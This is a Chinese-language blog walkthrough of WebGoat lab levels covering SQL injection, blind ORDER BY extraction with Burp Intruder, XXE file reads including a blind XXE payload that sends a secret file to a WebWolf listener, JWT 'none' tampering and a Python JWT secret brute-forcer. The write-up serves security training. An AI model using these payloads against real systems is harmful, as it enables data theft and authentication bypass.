src="https://img-blog.csdnimg.cn/20200815141023393.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<h3 id="HTTP-Proxies"><a href="#HTTP-Proxies" class="headerlink" title="HTTP Proxies"></a>HTTP Proxies</h3><p><font color=#F22225 >第六关<br><font color=#999AAA >前面的都是一款工具的教程，叫做Owasp zap、可以做代理，同时还是一个漏洞扫描工具，我抓包一般不用它，所以前面的看看就行直接绕过。还是使用burp来抓包。漏扫的话可以了解一下，免费的软件。<br>过关有点坑，直接抓取数据包，按照修改题目要求。<br>坑：直接修改changeme，怎么都是不对的，因为修改为get请求了，所以提交参数的方式就应该是get方式，要在URL里面进行提交。坑的话就这一点。按照下图的方式修改就可以了。<br><img src="https://img-blog.csdnimg.cn/20200815144902422.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>反思：第一次没有想到get请求改变后的变化，想的不够充分。现在想想，题目怎么可能就是让改一下参数呢？那如果这样，它设置这个要求的目的在哪，所以想的时候还是想想为什么会有这个要求。</p>
<h2 id="2-Injection-Flaws"><a href="#2-Injection-Flaws" class="headerlink" title="2.Injection Flaws"></a>2.Injection Flaws</h2><h3 id="SQL-Injection-advanced"><a href="#SQL-Injection-advanced" class="headerlink" title="SQL Injection (advanced)"></a>SQL Injection (advanced)</h3><p><font color=#F22225 >第三关<br><font color=#999AAA >SQL注入，查看到前两小节的知识，了解到是使用联合查询进行注入。<br>这个很重要，后面会用到，注意userid的类型<br><img src="https://img-blog.csdnimg.cn/20200815162412517.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>先尝试单引号闭合。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">' or <span class="token assign-left variable">1</span><span class="token operator">=</span><span class="token number">1</span> --</code></pre>
<p>尝试单引号闭合成功，且查询到了，WebGoat表中的内容，<br><img src="https://img-blog.csdnimg.cn/20200815153959395.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >union查询的特性就是上下两个SQL 语句所产生的栏位需要是同样的资料种类，所以观察刚刚查询出来的列数，了解到有七列，所以接下来要写在union后的SQL语句也必须要列出7列才行，因为已经知道user_system_data这个数据表中的前4列了，所以剩下的3列随便填点什么就行，需要注意的是，数据类型也必须一致。</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token string">' union select 1,user_name,password,'</span>hello<span class="token string">','</span>bye'<span class="token punctuation">,</span>cookie<span class="token punctuation">,</span><span class="token number">1</span> <span class="token keyword">from</span> user_system_data <span class="token comment">--</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200815162637269.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#1FAFAF >这里注意userid是字符串类型而不是int类型，前面提示过了，看上面的图。</p>
<p><font color=#F11111 >还有一种方法：<br>直接查询全部内容</p>
<pre class="language-sql" data-language="sql"><code class="language-sql">'<span class="token punctuation">;</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> user_system_data <span class="token comment">--</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200815162902347.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>最后将结果输入第二个框里就过关<br><img src="https://img-blog.csdnimg.cn/20200815163052169.png#pic_center" alt="m0re" loading="lazy"></p>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
<font color=#F22225 >第五关
能力有限，暂时没有解出。</font>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">

<h3 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h3><p><font color=#F22225 >第七关</font><br><font color=#999AAA ><br>字符类型的SQL注入，通过Smith可以查看一位用户的数据<br></font><br>测试，发现确实是存在注入的。</p>
<pre class="language-sql" data-language="sql"><code class="language-sql">Smith' <span class="token operator">or</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">1</span> <span class="token comment">--</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200815171944214.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>而日是POST方式的SQL注入，简单单的类型，直接sqlmap跑一下。<br>步骤：抓包，复制数据包内容，写入一个文件中。然后使用sqlmap直接获取数据库等信息。<br><font color=#F22225 >第八关</font><br><font color=#999AAA ><br>数字类型的SQL注入，通过101可以查看一位用户的数据<br></font></p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token number">101</span> <span class="token operator">or</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">1</span> <span class="token comment">--</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200815172806707.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>同上。</p>
<h3 id="SQL-Injection-mitigation"><a href="#SQL-Injection-mitigation" class="headerlink" title="SQL Injection (mitigation)"></a>SQL Injection (mitigation)</h3><p><font color=#999AAA >这一关需要使用order by 找出<code>IP address webgoat-prd server</code><br>排序是按照下面的这几个来排的。<br></font><br><img src="https://img-blog.csdnimg.cn/20200815180729994.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >开启代理，点击进行抓包。</font><br><img src="https://img-blog.csdnimg.cn/20200815213613843.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >可以看到是返回正常的页面了，因为它column是按照hostname来排序的，但是如果将它改一下</font></p>
<pre class="language-sql" data-language="sql"><code class="language-sql">GET <span class="token operator">/</span>WebGoat<span class="token operator">/</span>SqlInjection<span class="token operator">/</span>servers?<span class="token keyword">column</span><span class="token operator">=</span>m0re HTTP<span class="token operator">/</span><span class="token number">1.1</span></code></pre>
<p>然后go，就会发现它是返回错误的</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>html<span class="token operator">></span><span class="token operator">&lt;</span>body<span class="token operator">></span><span class="token operator">&lt;</span>h<span class="token operator"><span class="token file-descriptor important">1</span>></span>Whitelabel Error Page<span class="token operator">&lt;</span>/h<span class="token operator"><span class="token file-descriptor important">1</span>></span><span class="token operator">&lt;</span>p<span class="token operator">></span>This application has no explicit mapping <span class="token keyword">for</span> /error, so you are seeing this as a
fallback.<span class="token operator">&lt;</span>/p<span class="token operator">></span>
<span class="token operator">&lt;</span>div <span class="token assign-left variable">id</span><span class="token operator">=</span><span class="token string">'created'</span><span class="token operator">></span>Sat Aug <span class="token number">15</span> <span class="token number">21</span>:38:51 CST <span class="token number">202</span><span class="token operator"><span class="token file-descriptor important">0</span>&lt;</span>/div<span class="token operator">></span>
<span class="token operator">&lt;</span>div<span class="token operator">></span>There was an unexpected error <span class="token punctuation">(</span>type<span class="token operator">=</span>Internal Server Error, <span class="token assign-left variable">status</span><span class="token operator">=</span><span class="token number">500</span><span class="token punctuation">)</span>.<span class="token operator">&lt;</span>/div<span class="token operator">></span>
<span class="token operator">&lt;</span>div<span class="token operator">></span>user lacks privilege or object not found: M0RE <span class="token keyword">in</span> statement <span class="token punctuation">[</span>select id, hostname, ip, mac, status, description from servers  where status <span class="token operator">&amp;</span>lt<span class="token punctuation">;</span><span class="token operator">&amp;</span>gt<span class="token punctuation">;</span> <span class="token operator">&amp;</span><span class="token comment">#39;out of order&amp;#39; order by m0re]</span>
<span class="token operator">&lt;</span>/div<span class="token operator">></span><span class="token operator">&lt;</span>/body<span class="token operator">></span><span class="token operator">&lt;</span>/html<span class="token operator">></span></code></pre>
<p><font color=#999AAA >可以看到<code>order by</code>的参数是m0re，是刚才传入的。然后看返回的报错中<code> id, hostname, ip, mac, status, description</code>这几个都是可以进行排列的参数，表是<code>servers</code>但是有一个没见过就是<code>status</code>，所以<code>servers</code>中的status列中的数据才是webgoat-prd 的服务器的IP地址。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">GET /WebGoat/SqlInjection/servers?column<span class="token operator">=</span>case%20when%20<span class="token punctuation">(</span>substring<span class="token punctuation">((</span>select%20ip%20from%20servers%20where%20hostname<span class="token operator">=</span>%27webgoat-prd%27<span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span>%271%27<span class="token punctuation">)</span>%20then%20id%20else%20description%20end HTTP/1.1</code></pre>
<p><font color=#999AAA >这个是需要进行<br>抓取到发送到intruder模块进行爆破。</font><br><img src="https://img-blog.csdnimg.cn/20200815202715536.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA ><br>构造payload</font>，选择爆破方式为Cluster bomb</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">case</span><span class="token operator">%</span><span class="token number">20</span>when<span class="token operator">%</span><span class="token number">20</span><span class="token punctuation">(</span>substring<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">%</span><span class="token number">20</span>ip<span class="token operator">%</span><span class="token number">20</span>from<span class="token operator">%</span><span class="token number">20</span>servers<span class="token operator">%</span><span class="token number">20</span>where<span class="token operator">%</span><span class="token number">20</span>hostname<span class="token operator">=</span><span class="token operator">%</span><span class="token number">27</span>webgoat<span class="token operator">-</span>prd<span class="token operator">%</span><span class="token number">27</span><span class="token punctuation">)</span><span class="token punctuation">,</span>§<span class="token number">1</span>§<span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">%</span><span class="token number">27</span>§<span class="token number">2</span>§<span class="token operator">%</span><span class="token number">27</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">20</span>then<span class="token operator">%</span><span class="token number">20</span>id<span class="token operator">%</span><span class="token number">20</span>else<span class="token operator">%</span><span class="token number">20</span>description<span class="token operator">%</span><span class="token number">20</span>end</code></pre>
<p><img src="https://img-blog.csdnimg.cn/2020081520284545.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >再设置payload，第一个payload设置最大为15因为IP地址一般是<code>xxx.xxx.xxx.xxx</code>算上“点”正好15位。第二个payload设置为9，数字(0—9)不过我设置的时候忘了加0了，所以没有的情况就是0了，这个无碍。。</font></p>
<p><img src="https://img-blog.csdnimg.cn/20200815203045562.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >然后开始爆破，完成后手动进行设置comment做一个标记，按照id来排序的，设置个标记(这里使用yes，什么标记都行)</font><br><img src="https://img-blog.csdnimg.cn/20200815203216196.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >筛选一下，只查看有标记的记录。勾选。就可以看到了</font><br><img src="https://img-blog.csdnimg.cn/20200815203241823.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >这就是所有的了，然后IP地址读取很明显了，直接看着写出来就行</font><br><img src="https://img-blog.csdnimg.cn/20200815204018657.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >怎么看IP，举个栗子<br>方法：比如第一个，看两个payload，第一个是1，第二个是1，则IP地址的第一个是1<br>第二个，没有找到第一个payload是2的，所以就是0了。<br>第三个是4<br>第四个，上面没有，也就是”点”的位置。<br>这样就可以得出IP地址的前三位了<code>104.</code>后面的不再啰嗦。<br>总：<code>104.130.219.202</code><br></font></p>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">

<h3 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h3><p><font color=#999AAA >XXE漏洞的基础知识，可以参考我之前的学习博客——🔑<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45836474/article/details/107573925">XXE漏洞基础及简单利用</a><br><font color=#F22225 >第三关</font><br><font color=#999AAA ><br>随便提交了一个评论，没发现什么异常的，然后就是在评论区显示出来。</font><br><img src="https://img-blog.csdnimg.cn/20200816000903975.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<p>尝试抓包查看，发现了XML</p>
<p><img src="https://img-blog.csdnimg.cn/20200816000721653.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>直接构造简单的XML来提交</p>
<pre class="language-xml" data-language="xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">m0re</span> <span class="token punctuation">[</span><span class="token internal-subset">
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ELEMENT</span> <span class="token attr-name">name</span> <span class="token attr-name">ANY</span><span class="token punctuation">></span></span>
&lt;!ENTITY m0re SYSTEM "file:///C:/">
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>comment</span><span class="token punctuation">></span></span>  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>text</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&m0re;">&amp;m0re;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>text</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>comment</span><span class="token punctuation">></span></span></code></pre>
<p>因为我是在windows系统中搭建的环境，所以读取C盘内容<br>如果是linux系统的话，就使用<code>file:///</code><br><img src="https://img-blog.csdnimg.cn/20200816002235579.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#F22225 >第四关</font><br><font color=#999AAA >这次抓到的包是这样的<br><img src="https://img-blog.csdnimg.cn/20200816002549432.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>有一点是，这个<code>Content-Type</code>是json，上一题是XML，所以把这里进行一下修改，就可以，然后XML实体就使用上一题的就可以<br><img src="https://img-blog.csdnimg.cn/20200816003022834.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>发包，成功</font><br><img src="https://img-blog.csdnimg.cn/20200816003118149.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#F22225 >第七关Blind XXE assignment</font></p>
<p><font color=#999AAA >在webwolf上传外部XML文件<code>m0re.dtd</code></p>
<pre class="language-xml" data-language="xml"><code class="language-xml">&lt;!ENTITY % payload  "&lt;!ENTITY m0re SYSTEM 'http://127.0.0.1:8081/landing?text=%file;'>"></code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200817113030131.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >然后抓包修改，请求利用这个外部XML<br><img src="https://img-blog.csdnimg.cn/20200817114119981.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >payload如下：</p>
<pre class="language-xml" data-language="xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">root</span> <span class="token punctuation">[</span><span class="token internal-subset">
&lt;!ENTITY % file SYSTEM "file:///C:\Users\18101\.webgoat-8.0.0.M15\XXE/secret.txt">
&lt;!ENTITY % zxcv SYSTEM "http://127.0.0.1:8081/files/webgoat/m0re.dtd">
%zxcv;
%payload;
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>comment</span><span class="token punctuation">></span></span>  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>text</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&m0re;">&amp;m0re;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>text</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>comment</span><span class="token punctuation">></span></span></code></pre>
<p><font color=#999AAA >解释：因为我的是windows系统来搭建的，中间除了一点小差错，是jdk版本的原因，导致靶场无法访问，所以我又换了一个版本相对较低的靶场。这个webwolf的默认端口是8081，所以payload里面是8081。<br><code>http://127.0.0.1:8081/files/webgoat/m0re.dtd</code>这个路径是<code>http://127.0.0.1:8081/files/&#123;username&#125;/&#123;filename&#125;</code>，其他的也没什么了。<br>blind XXE就是没有回显的，所以去webwolf中查就是了。<br><img src="https://img-blog.csdnimg.cn/20200817120512583.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<p><font color=#999AAA >显示的内容需要进行URL解码后提交评论。</p>
<p><img src="https://img-blog.csdnimg.cn/20200817120621642.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<h2 id="3-Authentication-Flaws"><a href="#3-Authentication-Flaws" class="headerlink" title="3.Authentication Flaws"></a>3.Authentication Flaws</h2><h3 id="Authentication-Bypasses"><a href="#Authentication-Bypasses" class="headerlink" title="Authentication Bypasses"></a>Authentication Bypasses</h3><p><font color=#999AAA >身份验证缺陷——看完前面lesson去做第一关不难，只需要进行尝试删除或者修改参数就可以了。这里是进行了修改，删除没有成功。<br><img src="https://img-blog.csdnimg.cn/20200817131951956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<h3 id="JWT-tokens"><a href="#JWT-tokens" class="headerlink" title="JWT tokens"></a>JWT tokens</h3><p><font color=#999AAA >关于JWT tokens，之前好像是isCC有这么一道题，涉及的这个知识。之前题目是被不知名大佬搞坏了，所以没能复现成功，这次正好学习一下。</p>
<p><font color=#999AAA >尝试更改收到的token并通过更改token成为管理员用户。<br>token的组成，三部分：Header、Claims、Signature<br><img src="https://img-blog.csdnimg.cn/20200817143252541.png" alt="m0re" loading="lazy"><br><font color=#999AAA >而且token是经过base64编码过的。<br>用户获取token需要经过下面这一系列步骤：</p>
<p><img src="https://img-blog.csdnimg.cn/20200817144100191.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >用户输入用户名和密码，提交登录信息给服务器，然后创建一个JWT返回给浏览器，浏览器将token发送到授权的Header头中，服务器检验token的值，从token中验明用户身份信息，验证身份后就会返回给用户相应的信息。<br><font color=#F22225 >第四关</font><br><font color=#999AAA >这一关，可能是环境的问题，抓包获取可能存在问题，抓取的数据包没有发现token，建议搭建环境还是去linux系统或者使用docker进行搭建吧。<br>这里说一下方法和知识点。<br>抓取到数据包后分别对token的三个部分进行base64解码，Header部分后面的是加密算法，可将其改为none<br>也就是图中部分<br><img src="https://img-blog.csdnimg.cn/20200817163027242.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>在第二部分查看到与admin相关的部分，然后就是将它的参数修改一下。这种类型的题目是JWT中的基础部分，只需要修改token的值就可以了。<br>然后复制回burp中，进行发包。思路大概就是这个样子。<br><font color=#F22225 >第五关</font><br><font color=#999AAA >JWT cracking——爆破，需要使用python脚本进行爆破，前提需自备字典。字典够强，就可以跑出来——<a target="_blank" rel="noopener" href="https://wws.lanzous.com/icZOyfpz24b">我用的字典，点击下载</a><br>可以用我现在用的这个试试。测试呢嘛，就直接在源码里找到密码插进去就行。<br>python脚本——来自freebuf大佬阿信</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> termcolor
<span class="token keyword">import</span> jwt
<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    jwt_str <span class="token operator">=</span> <span class="token string">R'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0'</span>
    <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'C:\\Users\\18101\\Desktop\\m0re.txt'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
        <span class="token keyword">for</span> line <span class="token keyword">in</span> f<span class="token punctuation">:</span>
            key_ <span class="token operator">=</span> line<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span>
            <span class="token keyword">try</span><span class="token punctuation">:</span>
                jwt<span class="token punctuation">.</span>decode<span class="token punctuation">(</span>jwt_str<span class="token punctuation">,</span> verify<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">,</span> key<span class="token operator">=</span>key_<span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\r'</span><span class="token punctuation">,</span> <span class="token string">'\bfound it -->'</span><span class="token punctuation">,</span> termcolor<span class="token punctuation">.</span>colored<span class="token punctuation">(</span>key_<span class="token punctuation">,</span> <span class="token string">'green'</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">'&lt;--'</span><span class="token punctuation">)</span>
                <span class="token keyword">break</span>
            <span class="token keyword">except</span> <span class="token punctuation">(</span>jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>ExpiredSignatureError<span class="token punctuation">,</span> jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>InvalidAudienceError<span class="token punctuation">,</span> jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>InvalidIssuedAtError<span class="token punctuation">,</span> jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>InvalidIssuedAtError<span class="token punctuation">,</span> jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>ImmatureSignatureError<span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\r'</span><span class="token punctuation">,</span> <span class="token string">'\bfound it -->'</span><span class="token punctuation">,</span> termcolor<span class="token punctuation">.</span>colored<span class="token punctuation">(</span>key_<span class="token punctuation">,</span> <span class="token string">'green'</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">'&lt;--'</span><span class="token punctuation">)</span>
                <span class="token keyword">break</span>
            <span class="token keyword">except</span> jwt<span class="token punctuation">.</span>exceptions<span class="token punctuation">.</span>InvalidSignatureError<span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\r'</span><span class="token punctuation">,</span> <span class="token string">' '</span> <span class="token operator">*</span> <span class="token number">64</span><span class="token punctuation">,</span> <span class="token string">'\r\btry'</span><span class="token punctuation">,</span> key_<span class="token punctuation">,</span> end<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">,</span> flush<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
                <span class="token keyword">continue</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\r'</span><span class="token punctuation">,</span> <span class="token string">'\bsorry! nothing be found.'</span><span class="token punctuation">)</span></code></pre>
<p><font color=#999AAA >可能存在的错误：就是需要导入两个模块，分别是<code>termcolor</code>和<code>jwt</code><br><font color=#F22225 >这里有个坑就是，模块安装完后，还是会报错</font><br><code> module &#39;jwt&#39; has no attribute &#39;decode&#39;</code><br>查阅资料了解到python的模块中有<code>jwt</code>和<code>pyjwt</code>两个模块都是引用的<code>jwt</code>，其实不一样，这里使用的是<code>pyjwt</code>所以再安装<code>pyjwt</code>这个模块就好了。<br>运行结果：<br><img src="https://img-blog.csdnimg.cn/20200817162355710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#999AAA >记得将username处的tom改为WebGoat，下面的victory也填入。<br><img src="https://img-blog.csdnimg.cn/20200817182440855.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" 